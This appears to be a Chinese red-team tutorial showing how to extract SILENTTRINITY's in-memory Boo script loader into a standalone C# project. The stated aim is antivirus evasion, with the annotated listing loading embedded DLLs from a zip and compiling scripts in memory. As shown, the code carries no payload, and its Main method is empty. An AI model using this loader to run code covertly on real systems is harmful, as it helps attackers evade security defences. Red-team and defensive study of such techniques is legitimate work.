在ST类的ResolveEventHandler方法中会加载传入的dll,第二点就是怎么把dll带进去,它是作为一个stager的过程将那四个dll打包成zip文件传过去。在实际的红队渗透中不涉及C2的话咱们可以完全把这个功能单独提取出来用,好处就是在免杀效果上有非常不错的表现。咱们先把它单独提取出来演示一下,后面再来慢慢组装C2
使用C#内存加载运行Boolang：新建一个名为BooTest的C#项目
然后将ZIP包的DLL资源嵌入到项目中,DLL资源从https://github.com/boo-lang/boo获取
除SILENTTRINITY使用的四个DLL外,其实还有一个扩展方法,需要用到另外一个DLL,咱们就一起打包了
打包后右键添加文件夹改名为Resources
右键文件夹添加现有项
选择所有文件并引入打包好的Boo.zip
将生成操作改为嵌入的资源,点击保存后成功地将资源嵌入。
再添加zip操作类,代码位于https://github.com/jaime-olivares/zipstorer/blob/master/src/ZipStorer.cs
右键项目>添加>新建项,新建ZipStorer类然后将代码Copy过来,关于Boolang的语法在GitHub的wiki上有写,有兴趣的可以去看看。
然后将ST类的ResolveEventHandler函数和RunBooEngine函数Copy过来,和它用到的方法一起Copy过来,最后将其进行整理。
using Boo.Lang.Compiler;
using Boo.Lang.Compiler.IO;
using Boo.Lang.Compiler.Pipelines;
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace BooTest
{
    /// <summary>
    /// Stand-alone host that compiles a Boo script and runs it inside the current process.
    /// The Boo compiler assemblies travel inside this executable as the embedded resource
    /// "Boo.zip"; <see cref="ResolveEventHandler(object, ResolveEventArgs)"/> is written to
    /// serve them to the runtime from that archive. Note that nothing in this listing actually
    /// registers that handler on <c>AppDomain.CurrentDomain.AssemblyResolve</c>
    /// (<see cref="Main"/> is empty), so as written the Boo types referenced by
    /// <see cref="RunBooEngine"/> would still have to be located the normal way.
    /// </summary>
    class Program
    {
        // The embedded Boo.zip, opened once when the type is initialised and kept for the life
        // of the process; every resolve request is answered from this archive. It is opened
        // ReadWrite although nothing here writes to it. If the resource is absent,
        // GetResourceAsbytes throws (see there) inside the static initialiser, which surfaces as a
        // TypeInitializationException on first use of Program.
        private static ZipStorer _boozip = ZipStorer.Open(new MemoryStream(GetResourceAsbytes("Boo.zip")), FileAccess.ReadWrite, true);

        /// <summary>
        /// Reduces an assembly display name ("Boo.Lang, Version=..., Culture=..., PublicKeyToken=...")
        /// to the file name the assembly is expected under in the archive ("Boo.Lang.dll").
        /// </summary>
        /// <param name="name">Assembly name as supplied by <see cref="ResolveEventArgs.Name"/>.</param>
        /// <returns><paramref name="name"/> up to its first comma, with ".dll" appended.</returns>
        public static string GetDllName(string name)
        {
            var dllName = name + ".dll";
            // Only the simple name is kept. Because the test is "> 0", a name that *starts* with a
            // comma is passed through untouched; that does not occur for well-formed display names.
            if (name.IndexOf(',') > 0)
            {
                dllName = name.Substring(0, name.IndexOf(',')) + ".dll";
            }
            return dllName;
        }

        /// <summary>
        /// Maps a short resource name ("Boo.zip") to its full manifest name, which the build
        /// prefixes with the default namespace and folder path of the embedded file.
        /// </summary>
        /// <param name="resName">Suffix to look for among the manifest resource names.</param>
        /// <returns>The first manifest resource name ending in <paramref name="resName"/>, or null when none matches.</returns>
        // NOTE(review): EndsWith without a StringComparison is culture-sensitive; an ordinal
        // comparison is the conventional choice for resource names.
        public static string GetResourceFullName(string resName) => Assembly.GetExecutingAssembly().GetManifestResourceNames().FirstOrDefault(x => x.EndsWith(resName));

        /// <summary>Reads an embedded resource completely into memory.</summary>
        /// <param name="resName">Short resource name, resolved through <see cref="GetResourceFullName"/>.</param>
        /// <returns>The resource bytes.</returns>
        /// <exception cref="ArgumentNullException">
        /// When no manifest resource matches <paramref name="resName"/>: GetResourceFullName then
        /// returns null and GetManifestResourceStream rejects a null name. Consequently the
        /// null-conditional CopyTo below does not see a null stream in practice.
        /// </exception>
        internal static byte[] GetResourceAsbytes(string resName)
        {
            using (var resourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(GetResourceFullName(resName)))
            {
                using (var memoryStream = new MemoryStream())
                {
                    resourceStream?.CopyTo(memoryStream);
                    return memoryStream.ToArray();
                }
            }
        }

        /// <summary>
        /// Reads an embedded text resource as a string (original comment: "get the Boo script
        /// source"), decoded with StreamReader's default UTF-8/BOM detection. Not called anywhere
        /// in this listing.
        /// </summary>
        /// <param name="resName">Short resource name, resolved through <see cref="GetResourceFullName"/>.</param>
        /// <returns>The resource text.</returns>
        /// <exception cref="ArgumentNullException">
        /// When the resource is missing: either from GetManifestResourceStream (null name) or from
        /// the StreamReader constructor (null stream). Unlike <see cref="GetResourceAsbytes"/>
        /// there is no null guard on the stream here.
        /// </exception>
        public static string GetResourceAsString(string resName)
        {
            string _content = null;
            using (Stream _stream = Assembly.GetExecutingAssembly().GetManifestResourceStream(GetResourceFullName(resName)))
            {
                using (StreamReader _txtreader = new StreamReader(_stream))
                {
                    _content = _txtreader.ReadToEnd();
                }
            }
            return _content;
        }

        /// <summary>
        /// Extracts one entry from an open archive by exact file name.
        /// </summary>
        /// <param name="zip">Archive to search; its central directory is re-read on every call.</param>
        /// <param name="name">
        /// Entry name, compared case-sensitively (ordinal string inequality). An entry stored under
        /// a folder prefix inside the zip will not match a bare file name.
        /// </param>
        /// <returns>The entry contents, or null (<c>default</c> for byte[]) when no entry has that name.</returns>
        // NOTE(review): ExtractFile's bool result is ignored, so a failed extraction is not
        // distinguished from success here — presumably `data` is then null or empty; confirm
        // against ZipStorer.ExtractFile.
        public static byte[] GetResourceFromZip(ZipStorer zip, string name)
        {
            foreach (var entry in zip.ReadCentralDir())
            {
                if (entry.FilenameInZip != name) continue;
                zip.ExtractFile(entry, out var data);
                return data;
            }
            return default;
        }

        /// <summary>
        /// <see cref="AppDomain.AssemblyResolve"/> callback: when the runtime cannot find an
        /// assembly, supply it from the embedded Boo.zip, falling back to the same-named file in
        /// the .NET runtime directory. The assembly is loaded from a byte array, so the resulting
        /// <see cref="Assembly"/> has no backing file on disk. This listing only defines the
        /// handler; it is never attached to an AppDomain here.
        /// </summary>
        /// <param name="sender">Unused.</param>
        /// <param name="args">Carries the display name of the assembly being requested.</param>
        /// <returns>The loaded assembly.</returns>
        /// <exception cref="FileNotFoundException">
        /// When the name is in neither the archive nor the runtime directory (thrown by
        /// ReadAllBytes); the exception escapes the resolve callback instead of it returning null.
        /// </exception>
        private static Assembly ResolveEventHandler(object sender, ResolveEventArgs args)
        {
            var dllName = GetDllName(args.Name); // strip version/culture/token, keep "<simple name>.dll"
            Console.WriteLine($"Loading missing dll :{dllName}"); // echo each resolved dll to stdout (handy for seeing which assemblies a script pulls in)
            byte[] bytes;
            // Archive first; the file fallback builds the path by plain concatenation and so relies
            // on GetRuntimeDirectory() returning a trailing separator — TODO confirm for the target runtime.
            bytes = GetResourceFromZip(_boozip, dllName) ??
                File.ReadAllBytes(RuntimeEnvironment.GetRuntimeDirectory() + dllName);
            return Assembly.Load(bytes);
        }

        /// <summary>
        /// Compiles a Boo script in memory and runs its entry point in the current process
        /// (original comment: "parse and execute a Boo script").
        /// </summary>
        /// <param name="name">Label attached to the source input — presumably what the compiler reports in error locations; verify against StringInput.</param>
        /// <param name="source">Boo source text.</param>
        /// <remarks>
        /// Compile errors are printed, not thrown. Exceptions raised by the script itself come back
        /// wrapped in <see cref="System.Reflection.TargetInvocationException"/> from
        /// <c>EntryPoint.Invoke</c>, and a generated assembly without an entry point would cause a
        /// NullReferenceException at that same line.
        /// </remarks>
        public static void RunBooEngine(string name, string source)
        {
            Console.WriteLine("\n[*] Compiling Stage Code");
            // The bool presumably disables Boo's default reference set, with references added
            // explicitly below — TODO confirm against Boo's CompilerParameters constructor.
            CompilerParameters parameters = new CompilerParameters(false);
            parameters.Input.Add(new StringInput(name, source));
            parameters.Pipeline = new CompileToMemory(); // generated assembly stays in memory; nothing is written to disk
            parameters.Ducky = true; // Boo's "ducky" mode: untyped expressions are resolved at run time
            // References the script may use. LoadWithPartialName has been marked [Obsolete] since
            // .NET 2.0 and returns null for an assembly it cannot find, so a missing Boo dll turns
            // into AddAssembly(null) here rather than a clear load error; what AddAssembly does
            // with null is not visible from this listing.
            parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Extensions"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Parser"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Compiler"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("mscorlib"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("System"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("System.Core"));
            parameters.AddAssembly(Assembly.LoadWithPartialName("System.Web.Extensions"));
            //Console.WriteLine(compiler.Parameters.LibPaths);
            //compiler.Parameters.LoadAssembly("System");
            BooCompiler compiler = new BooCompiler(parameters);
            CompilerContext context = compiler.Run();
            //Note that the following code might throw an error if the Boo script had bugs.
            //Poke context.Errors to make sure.
            if (context.GeneratedAssembly != null)
            {
                Console.WriteLine("[+] Compilation Successful!");
                Console.WriteLine("[*] Executing");
                // The author considered detaching the resolver before running the script but left it in place:
                //AppDomain.CurrentDomain.AssemblyResolve -= ResolveEventHandler;
                // Passes a single null argument, so this only matches an entry point with exactly
                // one parameter (presumably the Boo-generated Main(argv)); a parameterless Main
                // would throw TargetParameterCountException here.
                context.GeneratedAssembly.EntryPoint.Invoke(null, new object[] { null });
            }
            else
            {
                Console.WriteLine("[-] Error(s) compiling script, this probably means your Boo script has bugs\n");
                foreach (CompilerError error in context.Errors) Console.WriteLine(error);
            }
        }

        /// <summary>
        /// Entry point, left empty in this excerpt: registering ResolveEventHandler and calling
        /// RunBooEngine with a script are not done here.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
        }
    }
}
RunBooEngine是用来解析执行boo脚本的,但是他在执行的时候需要引用boo的一些库函数,我们将boo的几个类型引入进来